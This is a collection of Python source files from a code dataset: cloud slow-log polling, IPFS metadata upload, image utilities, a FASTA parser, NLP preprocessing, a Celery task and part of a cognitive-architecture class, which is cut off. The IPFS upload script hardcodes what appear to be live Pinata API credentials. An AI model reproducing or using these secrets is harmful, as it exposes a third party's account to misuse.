list(alphabet)\nshuffle(L)\nprint(L)\n\n# making our dictionary using maketrans to create a special kind of dictionary that\n# defines how things will be translated.\n\n# encoding script\nencode_dict = str.maketrans(dict(zip(alphabet, L)))\nprint(encode_dict)\ntrans_word = 'This is a secret'.translate(encode_dict)\nprint('The encoded form of the message is ', trans_word, sep='\\n')\n\n# decoding script\ndecode_dict = str.maketrans(dict(zip(L, alphabet)))\nprint(decode_dict)\nexact_st = trans_word.translate(decode_dict)\nprint('The decoded form of the message is ', exact_st, sep='\\n')\n\n\n","repo_name":"osenya/py-ch","sub_path":"listpract2.py","file_name":"listpract2.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32072903431","text":"from tencentcloud.common import credential\nfrom tencentcloud.common.profile.client_profile import ClientProfile\nfrom 
tencentcloud.common.profile.http_profile import HttpProfile\nfrom tencentcloud.common.exception.tencent_cloud_sdk_exception import TencentCloudSDKException \nfrom tencentcloud.cdb.v20170320 import cdb_client, models\nfrom multiprocessing import Process\nimport json\nimport time\n\ndef get_mysql_instance(SecretId, SecretKey, tp):\n try: \n cred = credential.Credential(SecretId, SecretKey) \n httpProfile = HttpProfile()\n httpProfile.endpoint = \"cdb.tencentcloudapi.com\"\n\n clientProfile = ClientProfile()\n clientProfile.httpProfile = httpProfile\n client = cdb_client.CdbClient(cred, \"ap-guangzhou\", clientProfile) \n\n req = models.DescribeDBInstancesRequest()\n if tp:\n #params = '{\\\"InstanceTypes\\\":[1]}'\n params = '{\\\"OrderBy\\\":\\\"instanceId\\\"}'\n else:\n params = '{}'\n req.from_json_string(params)\n\n resp = client.DescribeDBInstances(req) \n js = json.loads(resp.to_json_string())\n mysql_Instance = {}\n if js[\"Items\"] != None:\n for data in js[\"Items\"]:\n if \"rc\" not in data[\"InstanceName\"]:\n mysql_Instance[data[\"InstanceId\"]] = data[\"InstanceName\"]\n return mysql_Instance # parm: dict\n\n except TencentCloudSDKException as err: \n print(err)\n\ndef get_mysql_slowlog(SecretId, SecretKey, InstanceId, InstanceIdName, stime, etime, process_sleep):\n time.sleep(process_sleep)\n try: \n cred = credential.Credential(SecretId, SecretKey) \n httpProfile = HttpProfile()\n httpProfile.endpoint = \"cdb.tencentcloudapi.com\"\n\n clientProfile = ClientProfile()\n clientProfile.httpProfile = httpProfile\n client = cdb_client.CdbClient(cred, \"ap-guangzhou\", clientProfile) \n\n req = models.DescribeSlowLogDataRequest()\n params = '{\\\"InstanceId\\\":\\\"' + InstanceId + '\\\",\\\"StartTime\\\":' + str(stime) + ',\\\"EndTime\\\":' + str(etime) + ',\\\"Limit\\\":400}'\n req.from_json_string(params)\n resp = client.DescribeSlowLogData(req)\n js = json.loads(resp.to_json_string())\n if js[\"Items\"] != None:\n for data in js[\"Items\"]:\n data[\"InstanceName\"] = InstanceIdName\n data['SqlText'] = data['SqlText'].replace('\\n', '').replace(' ', '').replace(\"'\",\"\")\n print(data)\n return 0\n else:\n return 0\n except TencentCloudSDKException as err: \n print(err)\nif __name__ == '__main__':\n SecretId = 'xxxxxx'\n SecretKey = 'xxxxxxx'\n now_time = int(time.time()) - 10\n stime = now_time - 10\n etime = now_time\n mysqlInstanceIds = get_mysql_instance(SecretId, SecretKey, tp=\"1\")\n mysqlInstanceIds.update(get_mysql_instance(SecretId, SecretKey, tp=\"\"))\n# print(mysqlInstanceIds)\n if mysqlInstanceIds:\n while True: \n #print(\"stime:\",stime,\"etime\",etime,\"notime:\", int(time.time()) - 10)\n process_sleep = 0\n for InstanceId,InstanceIdName in mysqlInstanceIds.items():\n #time.sleep(0.5) \n #get_mysql_slowlog(SecretId, SecretKey, InstanceId, InstanceIdName, stime, etime, process_sleep)\n process = Process(target=get_mysql_slowlog,args=(SecretId, SecretKey, InstanceId, InstanceIdName, stime, etime, process_sleep))\n process.start()\n process_sleep += 0.2\n now_time = int(time.time()) - 10\n ctime = now_time - etime\n stime = etime + 1\n if ctime > 1:\n etime = now_time\n else:\n etime = etime +9\n time.sleep(10)","repo_name":"Best1s/tencent_script","sub_path":"get_tencent_slowlog.py","file_name":"get_tencent_slowlog.py","file_ext":"py","file_size_in_byte":3826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29605748350","text":"from web3 import Web3\nimport os\nimport json\nfrom pathlib import 
Path\nimport requests\n\ntemplate_json_file = 'scripts\\metadata\\CreateCar.json'\n\ndef gettemplate(template_json_file):\n with open(template_json_file,\"r\") as jt:\n json_template = json.load(jt)\n print('json template is done !')\n return json_template\n\ndef addinfo_data(_NIV,json_template):\n data = json_template\n #get N+IV from Contract\n NIV = _NIV\n Fabrication = 'renault'\n Modele = 'GTLine'\n Type_Carrosserie = 'Berlin'\n Annee_Production = '2015'\n Carburant = 'Gasoil'\n Transmition = 'Auto'\n Moteur = 'Hme9'\n\n data['NIV'] = NIV\n data['Fabrication']= Fabrication\n data['Modele']= Modele\n data['Type_Carrosserie']= Type_Carrosserie\n data['Annee_Production']= Annee_Production\n data['Carburant']= Carburant\n data['Transmition']= Transmition\n data['Moteur']= Moteur\n\n print('DATA is done !')\n\n return data\n\ndef upload_json_file(data):\n filename= data['NIV'] + \"_creation.json\"\n if not os.path.exists(filename):\n with open(filename, \"w\") as outfile:\n json.dump(data, outfile)\n print('json uploaded is done !') \n return filename\n\n################### PINATA ###################\ndef jsontoipfs(data):\n headers = {\n \"pinata_api_key\": '12f7dbee4220cf56156b',\n \"pinata_secret_api_key\": '54d808d09c01b67afd9661871cc64c186bbf7e12b3cd1fb92c10564456c9707f'\n }\n endpoint = \"https://api.pinata.cloud/pinning/pinJSONToIPFS\"\n payload = data \n # pinJSONToIPFS expects a JSON body, so send the payload via the json kwarg\n response = requests.request(\"POST\", endpoint, headers=headers, json=payload)\n response_dict = json.loads(response.text)\n ##{'IpfsHash': 'QmQCsu8HtM569MmnjKM5SHUuhmkt3JibFEqjm9hJUZVpDD', 'PinSize': 188, 'Timestamp': '2023-03-18T11:16:12.012Z', 'isDuplicate': True} \n IpfsHash = response_dict['IpfsHash']\n print('Hash uploaded is done !') \n return IpfsHash\n\n# linktofile = 'https://gateway.pinata.cloud/ipfs/'+IpfsHash\n# print(linktofile)\n\n\ndef main():\n json_template = gettemplate(template_json_file)\n data = addinfo_data('11111',json_template)\n filename = upload_json_file(data)\n IpfsHash = jsontoipfs(data)\n print(f'Ipfshack is :{IpfsHash}')\n\n\nmain()","repo_name":"KhalilSayah/HACKATHON","sub_path":"scripts/metadata/create_car.py","file_name":"create_car.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"25038187677","text":"\"\"\"\nModule with data processing utilities\n\"\"\"\n\nimport io\nimport tarfile\n\nimport cv2\nimport numpy as np\n\n\nclass ImageProcessor:\n \"\"\"\n Image processor with common preprocessing and postprocessing logic\n \"\"\"\n\n @staticmethod\n def normalize_image(image: np.ndarray) -> np.ndarray:\n \"\"\"\n Normalize image.\n Input image is assumed to be in <0, 255> range.\n Output image will be normalized to <-1, 1> range and use float32 dtype\n\n Args:\n image (np.ndarray): image to be normalized\n\n Returns:\n np.ndarray: normalized image\n \"\"\"\n\n image = image.astype(np.float32)\n image = image - 127.5\n image = image / 127.5\n return image\n\n @staticmethod\n def denormalize_image(image: np.ndarray) -> np.ndarray:\n \"\"\"\n Denormalize image.\n Input image is assumed to be in <-1, 1> range.\n Output image will be normalized and clipped to <0, 255> range and use uint8 dtype\n\n Args:\n image (np.ndarray): image to be normalized\n\n Returns:\n np.ndarray: denormalized image\n \"\"\"\n\n image = image + 1\n image = image * 127.5\n # clip before casting so out-of-range values do not wrap around under uint8\n return np.clip(image, 0, 255).astype(np.uint8)\n\n @staticmethod\n def normalize_batch(batch: np.ndarray) -> np.ndarray:\n \"\"\"\n Normalize batch of 
images.\n Input images are assumed to be in <0, 255> range.\n Output images will be normalized to <-1, 1> range and use float32 dtype\n\n Args:\n batch (np.ndarray): batch of images to be normalized\n\n Returns:\n np.ndarray: batch of normalized images\n \"\"\"\n\n return np.array([ImageProcessor.normalize_image(image) for image in batch])\n\n @staticmethod\n def denormalize_batch(batch: np.ndarray) -> np.ndarray:\n \"\"\"\n Denormalize batch of images.\n Input images are assumed to be in <-1, 1> range.\n Output images will be normalized to <0, 255> range and use uint8 dtype\n\n Args:\n batch (np.ndarray): batch of images to be normalized\n\n Returns:\n np.ndarray: denormalized images\n \"\"\"\n\n return np.array([ImageProcessor.denormalize_image(image) for image in batch])\n\n\ndef get_image_tar_map(image: np.ndarray, name: str) -> dict:\n \"\"\"\n Get image tar map for given image and name\n\n Args:\n image (np.ndarray): image to compute tar file for\n name (str): name to be used in tar file\n\n Returns:\n dict: map with keys \"tar_info\" and \"bytes\"\n \"\"\"\n\n _, jpg_bytes = cv2.imencode(\".jpg\", image)\n\n # Create tar info for image\n tar_info = tarfile.TarInfo(name=name)\n tar_info.size = len(jpg_bytes)\n\n return {\n \"tar_info\": tar_info,\n \"bytes\": io.BytesIO(jpg_bytes)\n }\n","repo_name":"PuchatekwSzortach/pix2pix","sub_path":"net/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"1272653602","text":"#Author: Eli Draizen\n#File: read_fasta\n#Date: 10/10/12\n\n#Standard libraries\nimport sys, re\nimport string\n\n#Custom libraries\nfrom Sequence import DNASequence \n\ndef read_fasta(inFile, alphabet=None):\n \"\"\"Read in fasta file and return sequence objects with the fasta data\n \n inFile - a file-like object contianing the fasta data\n \"\"\"\n #Set up sequence and flags for sequence and quality\n fastaSeq = None\n empty = True\n \n #Create alphabet for regex based on IUPAC amino acid and nucleic acids codes\n if alphabet:\n pattern = \"[{}]+\".format(re.escape(alphabet))\n alphabet = re.compile(pattern, re.IGNORECASE)\n else:\n alphabet = re.compile(r\"[A-Z]+\", re.IGNORECASE)\n delete = \"\"\n \n for i, line in enumerate(inFile):\n line = line.rstrip()\n if fastaSeq and line.startswith(\">\"):\n yield fastaSeq\n \n if line.startswith(\">\"):\n #Start new sequence and get id and comment\n fastaSeq = DNASequence()\n \n #Get name and desciption\n try:\n fastaSeq.name, fastaSeq.description = line[1:].split(None, 1)\n except:\n fastaSeq.name = line[1:]\n\n \n empty = False\n elif fastaSeq is None:\n #Invalid FASTA, terminate program\n print >> sys.stderr, \"Error: Fasta file must begin with '>' \\\non line '{}'\".format(line)\n sys.exit(1)\n else:\n #Append line to sequence\n for seq in alphabet.findall(line):\n fastaSeq.sequence += seq.upper()\n \n #Return last fasta entry if exists \n if fastaSeq:\n yield fastaSeq\n \n #Warn if empty or has errors\n if empty:\n print >> sys.stderr, \"WARNING: fastaFile has no sequences.\"\n","repo_name":"edraizen/hsp_tiler","sub_path":"hsp_tiler/read_fasta.py","file_name":"read_fasta.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"35972913932","text":"# Makes a dictionary of sentences (keys) and IDs (values)\n# Given a text file, finds the ID of each sentence\n# Outputs a new CSV with the 
sentences and IDs in the order of the original text file\n\nimport csv\n\nids = {}\ncleaned = open(\"evanston5.csv\", \"w\")\n\n# This is the file that already contains sentence IDs\nmaster = open(\"/Users/laurapanfili/Desktop/fall-2016/NIH/Stimuli/csv/order1.csv\", \"r\")\nfor line in master:\n\tline = line.split(',')\n\t# Super hacky to get around sentences that have commas in them\n\tif len(line) > 4:\n\t\tline = [line[0], line[1], ','.join(line[2:-1]), line[-1]]\n\tsentID = line[0] + ',' + line[1]\n\tsent = line[2].strip(\"\\\"\")\n\tids[sent] = sentID\n\n# This is the file that's missing sentence IDs\nfix = open(\"/Users/laurapanfili/Desktop/fall-2016/NIH/Stimuli/northwestern/Evanston_order5.txt\", \"r\")\nfor line in fix:\n\tline = line.strip()\n\tif line != \"\" and line != \"PAUSE\":\n\t\tnewid = ids[line]\n\t\tnewLine = newid + \",\" + line\n\t\tcleaned.write(newLine)\n\t\tcleaned.write(\"\\n\")\n","repo_name":"lpanfili/IEEE","sub_path":"sentence-ids.py","file_name":"sentence-ids.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30946638089","text":"#!/usr/bin/env python3\n'''\ndef values_that_are_keys(my_dictionary):\n list=[]\n for value in my_dictionary.values():\n for key in my_dictionary.keys():\n if value==key:\n list.append(value)\n break\n \n return list\n\n\n\n\n# Uncomment these function calls to test your function:\nprint(values_that_are_keys({1:100, 2:1, 3:4, 4:10}))\n# should print [1, 4]\nprint(values_that_are_keys({\"a\":\"apple\", \"b\":\"a\", \"c\":100}))\n# should print [\"a\"]\n'''\n'''\nclass Node:\n def __init__(self, value, link_node=None):\n self.value = value\n self.link_node = link_node\n \n def set_link_node(self, link_node):\n self.link_node = link_node\n \n def get_link_node(self):\n return self.link_node\n \n def get_value(self):\n return self.value\n\n# Add your code below:\nyacko=Node(\"likes to yak\")\nwacko=Node(\"has a penchant for hoarding snacks\")\ndot=Node(\"enjoys spending time in movie lots\")\n\nyacko.set_link_node(dot)\ndot.set_link_node(wacko)\nprint(dot)\n'''\n\n# We'll be using our Node class\n'''\nclass Node:\n def __init__(self, value, next_node=None):\n self.value = value\n self.next_node = next_node\n \n def get_value(self):\n return self.value\n \n def get_next_node(self):\n return self.next_node\n \n def set_next_node(self, next_node):\n self.next_node = next_node\n\n# Create your LinkedList class below:\nclass LinkedList:\n def __init__(self,value=None):\n self.head_node=Node(value)\n def get_head_node(self):\n return self.head_node\n \n def insert_beginning(self,new_value):\n new_node=Node(new_value)\n new_node.set_next_node(self.head_node)\n self.head_node=new_node\n \n def stringify_list(self):\n string_list = \"\"\n current_node = self.get_head_node()\n while current_node:\n if current_node.get_value() != None:\n string_list += str(current_node.get_value()) + \"\\n\"\n current_node = current_node.get_next_node()\n return string_list\n \n def remove_node(self, value_to_remove):\n current_node = self.get_head_node()\n if current_node.get_value() == value_to_remove:\n self.head_node = current_node.get_next_node()\n else:\n while current_node:\n next_node = current_node.get_next_node()\n if next_node.get_value() == value_to_remove:\n current_node.set_next_node(next_node.get_next_node())\n current_node = None\n else:\n current_node = 
next_node\n\n\n\nll=LinkedList(5)\n#print(ll.get_head_node().get_value())\n#print(ll.get_head_node().get_next_node())\nll.insert_beginning(70)\nll.insert_beginning(5675)\nll.insert_beginning(90)\n\n#print(ll.stringify_list())\n\nll.remove_node(70)\nll.remove_node(5675)\nll.remove_node(5)\nll.remove_node(90)\nprint(ll.stringify_list())\n'''\n\n'''\notherset={1,4,7,7,3}\n#print(thisset)\n#print(otherset)\n\notherset2=set(range(1,10))\n#print(otherset2)\nA=[1,3,6,4,1,2,8,10]\nA=[1,2,3]\nm=max(A)\nprint(m)\n\nA=set(A)\nprint(A)\nB=set(range(1,m+1))\nprint(B)\nD=B-A\n\nif len(D)==0:\n print(m+1)\nelse:\n print(D)\n print(min(D))\n\n'''\n'''\ndef solution(A):\n #ab = set(range(1,abs(max(A))+2)).difference(set(A)) \n #return min(ab)\n\n print(set(range(1,abs(max(A))+2)))\n print(set(A))\n print(set(range(1,abs(max(A))+2)).difference(set(A)))\n\n\n\n\n\n\nsolution([1,3,6,4,1,2])\n\nsolution([-1,-3])\n\n'''\nstr=\"abba\"\nfor i in range(len(str) // 2):\n print(i)\n\n\n\n\n\n\n\n\n\n","repo_name":"luismendezescobar/myproy","sub_path":"python/test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"72860358862","text":"import datetime\n\nfrom celery.task import task\n\nfrom smarthome_admin.models import SocketTimerSlot\n\n\n@task\ndef check_schedule():\n now = datetime.datetime.now()\n next = datetime.datetime.now() + datetime.timedelta(hours=1)\n args = {datetime.datetime.now().strftime(\"%A\").lower(): True}\n tasks = SocketTimerSlot.objects.filter(**args).filter(\n start_time__gt=datetime.time(hour=now.hour), start_time__lt=datetime.time(hour=next.hour))\n\n [t.countdown() for t in tasks]\n\n\n\n","repo_name":"dmarkey/smarthome_admin","sub_path":"smarthome_admin/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"69842486863","text":"\"\"\"Set of functions which help parse and clean data and load it into pandas dataframes\"\"\"\nimport pandas as pd\nimport re\nimport math\nimport nltk\n# pretrained tokenizer\nnltk.download('punkt')\nfrom nltk.tokenize import word_tokenize \n\n# import stemmer\nfrom nltk.stem import PorterStemmer \n\n# remove stopwords\nnltk.download('stopwords')\nfrom nltk.corpus import stopwords\n\nfrom types import SimpleNamespace\n\ndef read_csv(path = '/Users/sander/Desktop/ML_Learn/AI-Judge/aita_clean.csv', do_preprocess=True, samples=False):\n data = pd.read_csv(path) \n\n # remove unnecessary columns\n data.drop(['id', 'timestamp', 'edited', 'score', 'num_comments', 'verdict'], axis=1, inplace=True)\n\n # remove rows with incomplete data\n data = data.dropna()\n\n if samples:\n data = data.sample(n=samples)\n\n if do_preprocess:\n data = preprocess(data)\n\n return data\n\ndef preprocess(data):\n \"\"\"Perform various preprocessing operations on \n title and body of data\"\"\"\n # Select columns to apply preprocessing to\n pp_cols = [\"title\", \"body\"]\n\n # stemmer\n ps = PorterStemmer() \n\n # make all lowercase\n data[pp_cols] = data[pp_cols].applymap(lambda s:s.lower())\n\n # Remove all the special characters\n data[pp_cols] = data[pp_cols].applymap(lambda s:re.sub(r'\\W', ' ',s))\n\n # remove all single characters\n data[pp_cols] = data[pp_cols].applymap(lambda s:re.sub(r'\\s+[a-zA-Z]\\s+', ' ',s))\n\n # Remove single characters from the start (no space before them, but space after)\n data[pp_cols] = 
data[pp_cols].applymap(lambda s:re.sub(r'^[a-zA-Z]\\s+', ' ',s))\n\n # Removing prefixed 'b'\n data[pp_cols] = data[pp_cols].applymap(lambda s:re.sub(r'^b\\s+', ' ',s,flags=re.I))\n\n # remove all of: x200b (zero-width space)\n data[pp_cols] = data[pp_cols].applymap(lambda s:re.sub(r'x200b', ' ',s))\n\n # Substituting multiple spaces with single space\n data[pp_cols] = data[pp_cols].applymap(lambda s:re.sub(r'\\s+', ' ',s,flags=re.I))\n\n # Remove single numbers\n data[pp_cols] = data[pp_cols].applymap(lambda s:re.sub(r'\\d+', ' ',s,flags=re.I))\n\n # tokenize data\n data[pp_cols] = data[pp_cols].applymap(lambda s:word_tokenize(s))\n\n # perform stemming\n data[pp_cols] = data[pp_cols].applymap(lambda s: [ps.stem(word) for word in s])\n\n # remove stopwords\n data[pp_cols] = data[pp_cols].applymap(lambda s: [word for word in s if word not in stopwords.words('english')])\n \n return data\n\ndef freq_map(in_data, labels, laplacian=True):\n words = {}\n \n totalPos = 0\n totalNeg = 0\n \n data = pd.concat([in_data, labels], axis=1)\n # calculate frequencies\n for index, row in data.iterrows():\n\n words_in_body = len(row['body'])\n\n if row['is_asshole'] == 1:\n totalPos += words_in_body\n else:\n totalNeg += words_in_body\n \n # iterate through body text of this row\n for word in row['body']:\n if word not in words:\n words[word] = SimpleNamespace(pos_freq=0, neg_freq = 0)\n if row['is_asshole'] == 1:\n words[word].pos_freq += 1.0\n else:\n words[word].neg_freq += 1.0\n if laplacian:\n LaplacianSmoothFrequencies(words, totalPos, totalNeg)\n\n return words\n\ndef LaplacianSmoothFrequencies(dic, totalPos, totalNeg):\n for key in dic:\n freq_data = dic[key]\n\n freq_data.pos_freq += 1.0\n freq_data.pos_freq/= (totalPos + len(dic))\n\n freq_data.neg_freq += 1.0\n freq_data.neg_freq /= (totalNeg + len(dic))\n \ndef test_freqs(dataframe, dic, do_preprocess = False, prior_ratio = 1):\n if do_preprocess:\n dataframe = preprocess(dataframe)\n pred_labels = []\n for index, row in dataframe.iterrows():\n bayes_result = 1\n for word in row['body']:\n if word in dic:\n bayes_result += math.log(dic[word].pos_freq / dic[word].neg_freq)\n\n bayes_result += math.log(prior_ratio)\n if bayes_result > 0:\n pred_labels.append(1)\n elif bayes_result < 0:\n pred_labels.append(0)\n else:\n pred_labels.append(-1)\n dataframe['pred_label'] = pred_labels\n\nif __name__ == '__main__':\n from data_processing import read_csv\n from data_processing import freq_map\n from data_processing import test_freqs\n from sklearn.model_selection import train_test_split\n\n data = read_csv(samples=5)\n\n X_train, X_test, y_train, y_test = train_test_split(data.drop(['is_asshole'], axis=1), data['is_asshole'], test_size=0.20, random_state=42)\n\n words = freq_map(X_train, y_train)\n\n test_freqs(data, words)\n","repo_name":"trigaten/AI-Judge","sub_path":"deprecated/FWindows/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":4647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"30180943041","text":"import math\nimport statistics\nfrom typing import Callable, Dict, List, Union\n\nfrom .classifier import Classifier\nfrom .errors import MissingStructureError\nfrom .float_between_one_and_zero import FloatBetweenOneAndZero\nfrom .focus import Focus\nfrom .hyper_parameters import HyperParameters\nfrom .id import ID\nfrom .location import Location\nfrom .logger import Logger\nfrom .random_machine import RandomMachine\nfrom .recycle_bin import RecycleBin\nfrom .structure 
import Structure\nfrom .structure_collections import StructureDict, StructureList, StructureSet\nfrom .structures import Frame, Space, View\nfrom .structures.links import Correspondence, Label, Relation\nfrom .structures.nodes import Chunk, Concept\nfrom .structures.nodes.chunks import LetterChunk\nfrom .structures.nodes.concepts import CompoundConcept\nfrom .structures.spaces import ConceptualSpace, ContextualSpace\nfrom .worldview import Worldview\n\n\nclass BubbleChamber:\n JUMP_THRESHOLD = HyperParameters.JUMP_THRESHOLD\n MAIN_INPUT_WEIGHT = HyperParameters.BUBBLE_CHAMBER_SATISFACTION_MAIN_INPUT_WEIGHT\n VIEWS_WEIGHT = HyperParameters.BUBBLE_CHAMBER_SATISFACTION_VIEW_QUALITIES_WEIGHT\n WORLDVIEW_WEIGHT = HyperParameters.BUBBLE_CHAMBER_SATISFACTION_WORLDVIEW_WEIGHT\n\n def __init__(self, focus, recycle_bin):\n self.loggers = {}\n self.random_machine = None\n self.worldview = None\n self.focus = focus\n self.recycle_bin = recycle_bin\n\n self.conceptual_spaces = None\n self.contextual_spaces = None\n self.frames = None\n self.frame_instances = None\n\n self.concepts = None\n self.chunks = None\n self.letter_chunks = None\n\n self.concept_links = None\n self.correspondences = None\n self.labels = None\n self.interspatial_labels = None\n self.relations = None\n self.interspatial_relations = None\n\n self.views = None\n\n self.satisfaction = 0\n self.general_satisfaction = 0\n self.result = None\n self.log_count = 0\n\n self.ACTIVATION_LOGGING_FREQUENCY = HyperParameters.ACTIVATION_LOGGING_FREQUENCY\n\n @classmethod\n def setup(cls, loggers: Dict[str, Logger], random_seed: int = None):\n bubble_chamber = cls(Focus(), RecycleBin())\n bubble_chamber.random_machine = RandomMachine(bubble_chamber, random_seed)\n bubble_chamber.reset(loggers)\n return bubble_chamber\n\n def reset(self, loggers: Dict[str, Logger]):\n self.loggers = loggers\n self.focus = Focus()\n self.worldview = Worldview(None)\n self.conceptual_spaces = self.new_set()\n self.contextual_spaces = self.new_set()\n self.frames = self.new_set()\n self.frame_instances = self.new_set()\n self.concepts = self.new_set()\n self.chunks = self.new_set()\n self.letter_chunks = self.new_set()\n self.concept_links = self.new_set()\n self.correspondences = self.new_set()\n self.labels = self.new_set()\n self.interspatial_labels = self.new_set()\n self.relations = self.new_set()\n self.interspatial_relations = self.new_set()\n self.views = self.new_set()\n self.satisfaction = 0\n self.general_satisfaction = 0\n self.result = None\n self.log_count = 0\n\n @property\n def spaces(self) -> StructureSet:\n return StructureSet.union(\n self.conceptual_spaces, self.contextual_spaces, self.frames\n )\n\n @property\n def input_spaces(self) -> StructureSet:\n return StructureSet.union(\n *[view.input_spaces for view in self.views],\n self.contextual_spaces.where(is_main_input=True),\n )\n\n @property\n def output_spaces(self) -> StructureSet:\n return self.new_set(*[view.output_space for view in self.views])\n\n @property\n def input_nodes(self) -> StructureSet:\n return StructureSet.union(\n *[space.contents.where(is_node=True) for space in self.input_spaces]\n )\n\n @property\n def size_of_raw_input(self) -> int:\n return sum(\n [\n len(space.contents.where(is_raw=True)) * len(space.conceptual_spaces)\n for space in self.contextual_spaces.where(is_main_input=True)\n ]\n )\n\n @property\n def structures(self) -> StructureSet:\n return StructureSet.union(\n self.conceptual_spaces,\n self.contextual_spaces,\n self.frames,\n self.chunks,\n 
self.concepts,\n self.correspondences,\n self.labels,\n self.letter_chunks,\n self.relations,\n self.views,\n self.concept_links,\n )\n\n @property\n def collections(self) -> dict:\n return {\n # views\n View: \"views\",\n # spaces\n ConceptualSpace: \"conceptual_spaces\",\n ContextualSpace: \"contextual_spaces\",\n Frame: \"frames\",\n # nodes\n Chunk: \"chunks\",\n Concept: \"concepts\",\n CompoundConcept: \"concepts\",\n LetterChunk: \"letter_chunks\",\n # links\n Correspondence: \"correspondences\",\n Label: \"labels\",\n Relation: \"relations\",\n }\n\n def recalculate_satisfaction(self):\n self.focus.recalculate_satisfaction()\n self.recalculate_general_satisfaction()\n if self.focus.view is not None:\n self.satisfaction = max(self.general_satisfaction, self.focus.satisfaction)\n else:\n self.satisfaction = self.general_satisfaction\n\n def recalculate_general_satisfaction(self):\n main_input_space = self.contextual_spaces.where(is_main_input=True).get()\n average_view_quality = (\n statistics.fmean([view.quality for view in self.views])\n if not self.views.is_empty\n else 0\n )\n self.general_satisfaction = sum(\n [\n self.MAIN_INPUT_WEIGHT * main_input_space.quality,\n self.VIEWS_WEIGHT * average_view_quality,\n self.WORLDVIEW_WEIGHT * self.worldview.satisfaction,\n ]\n )\n\n def update_activations(self) -> None:\n self.worldview.activate()\n for structure in self.structures:\n structure.recalculate_activation()\n for structure in self.structures:\n structure.update_activation()\n if (\n structure.activation > self.JUMP_THRESHOLD\n and self.random_machine.coin_flip()\n ):\n structure.activate()\n if self.log_count % self.ACTIVATION_LOGGING_FREQUENCY == 0:\n self.loggers[\"structure\"].log(structure)\n self.log_count += 1\n\n def new_dict(self, structures: dict = None, name: str = None) -> StructureDict:\n structures = {} if structures is None else structures\n return StructureDict(self, structures, name=name)\n\n def new_list(self, *structures: list, name: str = None) -> StructureList:\n return StructureList(self, structures, name=name)\n\n def new_set(self, *structures: list, name: str = None) -> StructureSet:\n return StructureSet(self, structures, name=name)\n\n def add(self, item):\n self.loggers[\"structure\"].log(item)\n for space in item.parent_spaces:\n space.add(item)\n self.loggers[\"structure\"].log(space)\n collection_name = self.collections[type(item)]\n getattr(self, collection_name).add(item)\n if item.is_interspatial and item.is_label:\n self.interspatial_labels.add(item)\n if item.is_interspatial and item.is_relation:\n self.interspatial_relations.add(item)\n\n def remove(self, item):\n if item.is_frame:\n self.frames.remove(item)\n if item.is_view:\n item_sub_views = item.sub_views.copy()\n for sub_view in item.sub_views:\n sub_view.super_views.remove(item)\n sub_view.cohesion_views.remove(item)\n for super_view in StructureSet.union(item.super_views, item.cohesion_views):\n for correspondence in super_view.members.copy():\n if (\n correspondence.start in item.parent_frame.input_space.contents\n or correspondence.start\n in item.parent_frame.output_space.contents\n ):\n self.remove(correspondence)\n if correspondence.parent_view in item_sub_views:\n super_view.remove(correspondence)\n super_view.sub_views.remove(item)\n for frame in item.frames:\n super_view.frames.remove(frame)\n correspondences = item.members.where(parent_view=item)\n for correspondence in correspondences:\n self.remove(correspondence)\n item.parent_frame.progenitor.instances.remove(item)\n 
item.parent_frame.parent_concept.instances.remove(item)\n self.remove(item.parent_frame)\n if item.is_correspondence:\n item.parent_view.remove(item)\n if item.is_link:\n if item.is_interspatial:\n self.interspatial_labels.remove(item)\n self.interspatial_relations.remove(item)\n item.parent_concept.instances.remove(item)\n for argument in item.arguments:\n argument.links_out.remove(item)\n argument.links_in.remove(item)\n argument.champion_labels.remove(item)\n argument.champion_relations.remove(item)\n argument.recalculate_exigency()\n if item.is_relation:\n if item.parent_concept is not None:\n item.parent_concept.instances.remove(item)\n if None not in {item.parent_concept, item.conceptual_space}:\n try:\n item.parent_concept.relations.where(\n parent_concept=item.conceptual_space.parent_concept\n ).get().end.instances.remove(item)\n except MissingStructureError:\n pass\n if item.is_chunk:\n for view in self.views.copy():\n if item in view.grouped_nodes:\n self.remove(view)\n for sub_chunk in item.sub_chunks:\n sub_chunk.super_chunks.remove(item)\n sub_chunk.recalculate_exigency()\n for super_chunk in item.super_chunks:\n super_chunk.sub_chunks.remove(item)\n for link in item.links:\n self.remove(link)\n for space in item.parent_spaces:\n space.contents.remove(item)\n if item.is_letter_chunk:\n if item.abstract_chunk is not None:\n item.abstract_chunk.instances.remove(item)\n collection_name = self.collections[type(item)]\n getattr(self, collection_name).remove(item)\n\n def new_conceptual_space(\n self,\n name: str,\n parent_concept: Concept,\n breadth: int = 1,\n no_of_dimensions: int = 0,\n parent_id: str = \"\",\n possible_instances: StructureSet = None,\n dimensions: List[ConceptualSpace] = None,\n sub_spaces: List[ConceptualSpace] = None,\n is_basic_level: bool = False,\n is_symbolic: bool = False,\n super_space_to_coordinate_function_map: Dict[str, Callable] = None,\n ) -> ConceptualSpace:\n possible_instances = (\n self.new_set() if possible_instances is None else possible_instances\n )\n dimensions = [] if dimensions is None else dimensions\n sub_spaces = [] if sub_spaces is None else sub_spaces\n space = ConceptualSpace(\n structure_id=ID.new(ConceptualSpace),\n parent_id=parent_id,\n name=name,\n parent_concept=parent_concept,\n contents=self.new_set(),\n breadth=breadth,\n no_of_dimensions=no_of_dimensions,\n 